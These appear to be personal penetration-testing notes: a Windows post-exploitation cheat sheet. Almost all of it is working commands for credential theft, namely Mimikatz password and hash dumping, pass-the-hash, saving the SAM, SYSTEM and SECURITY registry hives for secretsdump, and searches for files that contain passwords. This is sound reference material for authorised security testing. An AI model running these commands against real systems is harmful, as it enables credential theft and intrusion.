Windows

Wednesday, June 24, 2020

8:39 AM Backlink: reference-notes-readme


GUIDES

GitHub - emilyanncr/Windows-Post-Exploitation: Windows post-exploitation tools, resources, techniques and commands to use during post-exploitation phase of penetration test. Contributions are appreciated. Enjoy!

Mimikatz

Dump Hashes

privilege::debug
sekurlsa::logonPasswords

PTH

privilege::debug
sekurlsa::pth /user

Commands

List PIDs with their task names

tasklist /svc

list connections

netstat -ano

show files plus hidden

dir /a

The windows version of cat is type

Type .\*

Dump Hashes

reg save hklm\SAM c:\sam
reg save hklm\SYSTEM c:\system
reg save hklm\SECURITY c:\security

rebuild on Kali

secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

Find Juicy Files

dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini